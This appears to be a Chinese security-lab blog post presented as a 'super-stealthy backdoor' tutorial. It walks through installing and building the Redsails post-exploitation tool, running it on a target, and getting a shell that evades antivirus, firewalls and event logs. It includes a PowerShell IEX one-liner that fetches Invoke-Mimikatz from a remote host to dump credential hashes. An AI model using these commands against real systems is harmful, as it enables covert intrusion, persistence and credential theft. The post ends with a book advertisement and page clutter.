超级隐蔽之后门技巧

在我们以往的渗透测试中,经常会遇到目标存在杀软,防火墙等防护软件的情况,导致我们的连接不稳定以及连接中断等情况,今天就教大家如何悄无声息的绕过层层防护开启一个愉快的渗透之旅,请抓紧坐好,准备开车了。

Redsails是使用python开发的一款后渗透测试工具,其目的是可以使我们在目标主机上执行命令且无需创建任何事件日志以及网络连接,详细作用如下:

  • 在目标主机持续建立连接

  • 绕过许多常见的事件日志

  • 产生虚假日志/网络流量

Redsails依赖于PyDivert、Pycrypto和WinDivert包,我们可以使用以下命令进行安装:

pip install pydivert
pip install pbkdf2
easy_install pycrypto
在安装pycrypto之前,还需要Microsoft Visual C ++编译器。

创建可执行文件

pip install pyinstaller
pyinstaller-script.py -F --clean redSails.spec

用法

在目标主机上执行:
redsails.exe -a <IP Address> -p <password> -o <port>
在本地进行监听,使用相同的密码就可以获得一个shell
python redsailsClient.py -t <IP Address> -p <password> -o <port>




这时候神奇的事情发生了,我们看到shell已经连接成功,但是并未建立新的连接,连接端口也一直处于监听状态。

而更加神奇的是即使目标主机上并未开放我们的连接端口,我们也可以正常进行连接,并且不会创建新的连接。

如图,我们使用了22端口进行了连接,但是在目标主机上并未开放22端口,并且也没有任何关于22端口的连接信息。

连接成功之后,我们便可以通过redsails控制台在目标主机上执行系统命令了,执行命令方法如下:

SHELL::net users
SHELL::whoami
SHELL::ipconfig

       Redsails也支持PowerShell,因此它可以执行PowerShell命令。


例如我们想对目标的hash进行抓取,我们可以这样调用Powershell脚本来执行:

PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Mimikatz.ps1');Invoke-Mimikatz

也可以利用powershell与Metasploit进行交互,不过这样就会建立一个新的连接,容易被防护系统检测到。

参考资料:

https://github.com/BeetleChunks/redsails%E2%80%8B%E2%80%8B

新书:《内网安全攻防:渗透测试实战指南》火爆上市!

购买链接:https://item.jd.com/12743210.html

Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,2019年11月出版《内网安全攻防:渗透测试实战指南》目前在编Python渗透测试,JAVA代码审计和逆向工程等方面书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。

官方网站:www.ms08067.com

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值